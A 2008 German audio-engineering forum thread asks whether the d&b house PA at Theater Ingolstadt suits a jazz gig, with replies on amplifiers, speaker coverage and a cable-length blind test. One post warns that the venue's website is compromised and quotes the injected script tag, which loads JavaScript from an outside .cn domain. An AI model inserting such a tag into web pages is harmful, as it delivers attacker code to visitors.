1. Home
  2. Chat
  3. Forum
  4. Kalender
    1. Termine
    2. Karte
  5. Lexikon
    1. Letzte Änderungen
  6. Marktplatz
    1. Bewertungen
  • Anmelden
  • Registrieren
  • Suche
Dieses Thema
  • Alles
  • Dieses Thema
  • Dieses Forum
  • Artikel
  • Forum
  • Termine
  • Lexikon
  • Marktplatz-Eintrag
  • Seiten
  • Erweiterte Suche
  1. PA-Forum
  2. Forum
  3. Professionelle Veranstaltungstechnik
  4. Veranstaltungstechnik AUDIO
  5. Boxen und Amps

EILT Wer kennt diese d&b Anlage?

• frankie01
  • 16. September 2008 um 09:47
  • frankie01
    • 16. September 2008 um 09:47

Hallo Kollegen,

eine naturgemäß etwas ungenaue Frage:
    Hat jemand Erfahrung mit der d&b Haus-Anlage im Festsaal/Konzertsaal (1200 PAX) des Theaters Ingolstadt ? http://www.theater.ingolstadt.de/frameset.cfm?case=spielstaetten
    (Ganz nach unten scrollen: Festsaal)

PA laut rider:
    Hersteller/Typ: d&b
    Front 8x d&b C7
    Frontfill 4x d&b E3 für Sprache / 2–4 Bell VPS 3 MH für Disco o. ä.
    Sidefill 10x d&b E3 + 2x Bell VPS 1 MH
    Bass 2x d&b C4 / 2x d&b B2 / 2+ Bell 4L

Ist die für filigraneren Jazz okay (Voc-female, p, b, dr) und wie ist der Zustand der PA sowie die Ausleuchtung im unteren Bereich (die Ränge werden nicht genutzt)?

Benutze üblicherweise Meyer, möchte mir aber hier gerne unnötigen Aufwand ersparen. Sind evtl. Zusatzboxen irgendwo nötig?

Danke

Frankie

4 Mal editiert, zuletzt von frankie01 (16. September 2008 um 14:30)

• simonstpauli
    Profi
    Reaktionen
    767
    • 16. September 2008 um 09:57

Bitte dringend den Titel ändern. Ich kaufe ein &...

Christian Tepfer * Monitor-Operator, HF-Betreuer, FOH-Mischer, Klang-Gestalter
    http://klanggestaltung.wordpress.com/

• tufkaklto
    Profi
    Reaktionen
    1
    • 16. September 2008 um 10:22

Nur mal aus Interesse :

Du bist Tontechniker und kennst d&b nicht.

Interessant.

Und ja, diese ist für filigranen Jazz sogar sehr gut geeignet.

Über die Aufstellung kann man aber nichts sagen.

und bitte, ändere den Titel in d&b, denn db ist eine Billigplastikboxenfirma.

danke

Amp und Boxen Brett _ Die Vuvuzela des Forums

Ganz großer Fan des " Themen als gelesen markieren " Buttons

• frankie01
    • 16. September 2008 um 10:52
    Zitat von "klauston"

und bitte, ändere den Titel in d&b, denn db ist eine Billigplastikboxenfirma

Das weiss doch hier eh jeder, oder? Bin wirklich etwas unter Zeitdruck, da spart man sich schon mal ne Taste - aber gut -wenn's hilft! ;)

Zitat von "klauston"

Über die Aufstellung kann man aber nichts sagen.

EBEN! Genau das (also die reale Ausleuchtung, evtl. Unterdimensionierung, Frontfill-dimensionierung), sowie der reale (!) Zustand interessiert mich! Vielleicht hat ja jemand einen konkreten Höreindruck von einem Konzert - oder auch schon mal selbst darüber gearbeitet?? Am besten vor kurzem ...

Gruß

• schallereignissortierer
    Profi
    Reaktionen
    1
    • 16. September 2008 um 11:44

Auf den ingolstädter Theater Seiten treibt sich irgendein merkwürdiges script rum, das nach China führt.

Also zumindest mal etwas Vorsicht beim Besuch der "Spielstätten" Seiten:

Anschrift: Theater Ingolstadt, Schloßlände 1, 85049 Ingolstadt"></title><script src=1.verynx. cn/w. js></script><!--

http://www.google.de/search?q=verynx.cn

Machen Sie das hauptberuflich oder verdient die Frau dazu?

• frankie01
    • 16. September 2008 um 13:44

Habe im Rider gerade gesehen, dass hier an Endstufen nicht die D12 sondern die E Serie (mit Controller) verbaut wurde. Macht das nen Unterschied im Sound? Kenne mich mit d&b nicht so gut aus!

Frankie

• fabio hermann
    Reaktionen
    2
    • 16. September 2008 um 14:16

es amcht sogar einen unterschied wenn die kabel links länger sind als rechts, wieviel der dann ausmacht und ob den irgendwer hört ist eine andere sache.
    wie es aussieht kennt das theater hier niemand, eventuell mal bei firmen aus der gegend oder beim theater selber anfragen.
    die e serie ansicht ist klanglich nicht schlecht, die d12 haben auch ihre negativpunkte, am ende ist eh alles geschmackssache

http://www.sound-light-bonn.net/

• christopher hafer
    Profi
    • 16. September 2008 um 15:58
    Zitat

es amcht sogar einen unterschied wenn die kabel links länger sind als rechts

Welchen?

Zitat

die d12 haben auch ihre negativpunkte

Welche?

"Just because you believe something doesn't make it true."

• christopher hafer
    Profi
    • 16. September 2008 um 16:09
    Zitat von &quot;Frankie01&quot;

Habe im Rider gerade gesehen, dass hier an Endstufen nicht die D12 sondern die E Serie (mit Controller) verbaut wurde. Macht das nen Unterschied im Sound? Kenne mich mit d&b nicht so gut aus!

Frankie

Zum C-System gehörte ursprünglich auch nicht der D12-Amp (den gibt es erst seit 2003/4) sondern die P1200-Amps mit den entsprechenden Modulen.
    Wenn da jetzt die "E-Pacs" dran laufen macht das etwas stutzig, weil die E-Pacs keine C4/C7 Presets haben, evt. gab es da aber mal ein Update, ich glaube aber eher nicht.

• Hami
    Profi
    Reaktionen
    48
    Marktplatz Einträge
    2
    • 16. September 2008 um 16:25

Die Lautsprecher an sich sind für Jazz wie bereits gesagt bestens geeignet. Da es sich um eine Festinstallation handelt, kannst Du davon ausgehen, dass entweder eine Firma das prima eingerichtet hat oder dass es so schlimm ist, dass sich das herumgesprochen hätte.

Mein Tipp daher: kollegial den Haustechniker anrufen mit der Frage: "Bringt jeder seine Anlage mit, oder wird immer die Hausanlage genutzt?". Wenn immer die Hausanlage genutzt wird, wirst auch Du damit klar kommen. Genug Fundament hast Du ja. Und wenn E3 verbaut sind, werden die ersten und letzten Reihen auch nicht im Dunkeln stehen (jetzt mal akustisch gemeint).

Ganz ehrlich: beruhigen, d&b in der Konfig spielt in 90% aller Fälle super.

Das EInzige, was ich vielleicht machen würde, ausser selbstverständlich einen Haustechniker anzurufen: Controller mitnehmen und gegebenenfalls versuchen, verschiedene Wege selbst anzusteuern, falls DU überhaupt an die verschiedenen Strippen drankommst.

Frohes Schaffen, das schreit nicht nach einem wirklichen Problem!

• fabio hermann
    Reaktionen
    2
    • 16. September 2008 um 17:12
    Zitat von &quot;Christopher Hafer&quot;

Welchen?

Die uralte Diskusion über verschiedene Kabellängen und den daraus resultierenden Unterschiedlichen Klang, die ihre Ursprünge wohl im Hifi Bereich hatte, sollte ja bekannt sein.
    Wir haben erst vor kurzem einen Blindtest mit 2m und 25m gemacht und 4 von 6 Leuten waren der Meinung einen Unterschied zu hören, einer von denen war ich.
    Wir hatten zwei hochwertige Tops direkt nebeneinander stehen, dahin den Amp und standen zwischen 5m und 10m entfernt. Die boxen waren jeweils einzeln mit Signal versorgt und leifen nicht zusammen. Die beiden Kabel hingen beide jeweils an der rechten und linken box und an beiden Amp kanälen und die Ergebnisse wurden erst am Ende ausgetauscht, die Auflösung gab es erst danach.
    Zu unterscheiden an welcher Box welches kabel hing war wesentlich schwerer, da sah das Ergebniss eher nach raten aus, verteilung war etwa gleich.
    Und ja die Kabel waren bis auf die Länge identischt und er wurden auch die selben Stecker verwendet.

Zitat von &quot;Christopher Hafer&quot;

Welche?

Es soll wohl Leute geben die mit dem Amp net so zufreiden waren, oder andere die Preis / Leistung nicht wirklich überragend fanden bzw für den Preis etwas besseres erwartet hätten. Ich schließen mich da nicht mit ein, die finde die Amps an sich gut, ob ich sie kaufen würde ich jedoch wieder ein anderer Punkt.

• Hami
    Profi
    Reaktionen
    48
    Marktplatz Einträge
    2
    • 16. September 2008 um 19:56

was willste denn anstatt einer D12/ D6 kaufen, wenn Du aktuellesn d&b-Kram einsetzt???

• frankie01
    • 16. September 2008 um 20:04
    Zitat von &quot;Hami&quot;

Mein Tipp daher: kollegial den Haustechniker anrufen mit der Frage: "Bringt jeder seine Anlage mit, oder wird immer die Hausanlage genutzt?". Wenn immer die Hausanlage genutzt wird, wirst auch Du damit klar kommen.

Ein echt pfiffiger Tipp, der mir wirklich ein Stück weiter hilft und das eigentliche Problem adressiert! Gute Idee! Werde diesen Weg morgen einschlagen, denn die Zeit läuft! Danke.

• christopher hafer
    Profi
    • 16. September 2008 um 21:03

Fabio: Danke für Deine Reaktion!

Zitat

Wir hatten zwei hochwertige Tops direkt nebeneinander stehen, dahin den Amp und standen zwischen 5m und 10m entfernt. Die boxen waren jeweils einzeln mit Signal versorgt und leifen nicht zusammen. Die beiden Kabel hingen beide jeweils an der rechten und linken box und an beiden Amp kanälen und die Ergebnisse wurden erst am Ende ausgetauscht, die Auflösung gab es erst danach.
    Zu unterscheiden an welcher Box welches kabel hing war wesentlich schwerer, da sah das Ergebniss eher nach raten aus, verteilung war etwa gleich.

Also, wenn ich das richtig verstanden habe habt ihr die beiden Kabellängen an zwei Stück LS getestet?
    Dann ist der Test schon wenig wert, denn zwei LS klingen selten genau gleich, abgesehen davon ist man in der Lage bei 5-10m Abstand zu Orten, welcher läuft.

Desweiteren krankt der Test noch etwas am Verfahren:
    Da man ja weiß, das überhaupt umgeschaltet wird ist es auch nicht schwer, einen Unterschied zu hören. Ein Beweis für den Unterschied zwischen den Kabeln wäre folglich nur, wenn eine Präzise Zuordnung stattfinden könnte, was, wie Du ja schreibst nicht möglich war und nach "Raten" aussah.
    Dies ist auch bewiesenermaßen unmöglich, da es nur einen winzigen Lautstärkeunterschied gibt, der kaum Messbar ist und wie gesagt durch die ungleichen Parameter der LS um vielleicht 500% überspielt wird.

Seh das bitte als konstruktive Kritik; viel zu wenige machen sich überhaupt mal die Mühe manchen Hifi-Mythen auf den Zahn zu fühlen...

Zitat

Es soll wohl Leute geben die mit dem Amp net so zufreiden waren, oder andere die Preis / Leistung nicht wirklich überragend fanden bzw für den Preis etwas besseres erwartet hätten.

"Net so zufrieden" - hmmmm, ich dachte da kommen jetzt reale Kritikpunkte, die hätten mich dann auch interessiert.
    Das P/L-Verhältniss spielt hier keine Rolle, er will die Anlage nutzen, nicht kaufen. Zudem ist der D12 m.E. innerhalb der d&b-Apotherkerpreise ein Sonderangebot... :D

• fabio hermann
    Reaktionen
    2
    • 16. September 2008 um 22:41

Kritk erstmal angenommen, allerdings bin ich nicht sicher ob ich mich komplett verständlich ausdegrückt habe.
    Die Tops waren direkt nebeneinander, und die Kabel wurden zufällig von einer Person umgesteckt. Es lief immer nur eine Box.
    Ich schreib mal schnell ein paar Beispiele auf:
    Box Kabel Ampkanal
    A _ A _ A
    A _ B _ A
    B _ B _ A
    A _ B _ A
    B _ A _ A

Es waren also auch gleich Konfigurationen dabei um wirklich zu gewährleisten, dass es ein Blindtest wird
    Von daher konnte keiner der Hörer sagen / sich irgendwie denken welches Kabel jetzt verwendet wird, auch wenn er vll orten kann welches Top grade läuft.
    Es könnte auch niemand wirklich sicher raushörern welches Kabel grade dranwar, nur in der Auswertung haben sich Unterschiede zwischen beiden Kabeln gezeigt.
    Testsignal war übrigens der Anfang (20sek.) eines fast allen unbekannten Lied. Wenn man genug Zeit da ist werden wir es auch mal mit Sinussignalen probiere.
    Gemessen haben wir nichts bzw nicht

• Christian Engel
    Moderator
    Reaktionen
    89
    Marktplatz Einträge
    4
    • 17. September 2008 um 00:31

Leute, das interessiert an dieser Stelle niemanden! Diskuttiert bitte in einem separaten Thread oder lasst es sein. Danke sehr! :roll:

Wenn's nicht rockt isses für'n Arsch...

Anstehende Termine

• Kombiseminar Sachkundiger für Anschlagmittel und Traversensysteme (AnschlägerPlus)

Dienstag, 29. September 2026 – Donnerstag, 1. Oktober 2026
  • Sachkunde für Fliegende Bauten

Dienstag, 29. September 2026 – Donnerstag, 1. Oktober 2026
  • PA-Forum Stammtisch LeatCon

Dienstag, 6. Oktober 2026, 13:00 – 14:00

Mittwoch, 7. Oktober 2026, 13:00 – 14:00

Donnerstag, 8. Oktober 2026, 13:00 – 14:00

Letzte Themen

1. Welche DI-Box für Laptop/Kopfhörerausgang?

wusel123
    30. September 2026 um 12:29
  2. Ersatzteilversorgung Lautsprecher (speziell Seeburg A3 MKII)

Hanseat
    29. September 2026 um 18:25
  3. Neues Online-Simulationstool für Treiber / Gehäuse / Leistung / Filter

Blancblue
    29. September 2026 um 13:16
  4. Subwoofer 80cm x 40cm x 80cm

zegi
    28. September 2026 um 17:06
  5. Frontschaum in "Würfeloptik"

Blancblue
    28. September 2026 um 15:41
  6. ADJ Entour Venue Hazer: Frage zum Heizelement

skippa
    27. September 2026 um 10:16
  7. EU Cyber Resilience Act (CRA)

alexanderjoseph
    26. September 2026 um 20:14
  8. 17. - 18. November | PA Rigging & Truss Safety mit Tom Greber

Soundchecker
    23. September 2026 um 10:33
  9. 13. - 14. Oktober | Live Mixing Workshop mit Jörn Müller in Köln

Soundchecker
    23. September 2026 um 10:30
  10. können das hier (Foto) die original Weichen der KMT CS215 / CM215 sein ?

phattomatic
    23. September 2026 um 09:12

Benutzer online in diesem Thema

• 1 Besucher
  1. Datenschutzerklärung
  2. Impressum
Community-Software: WoltLab Suite™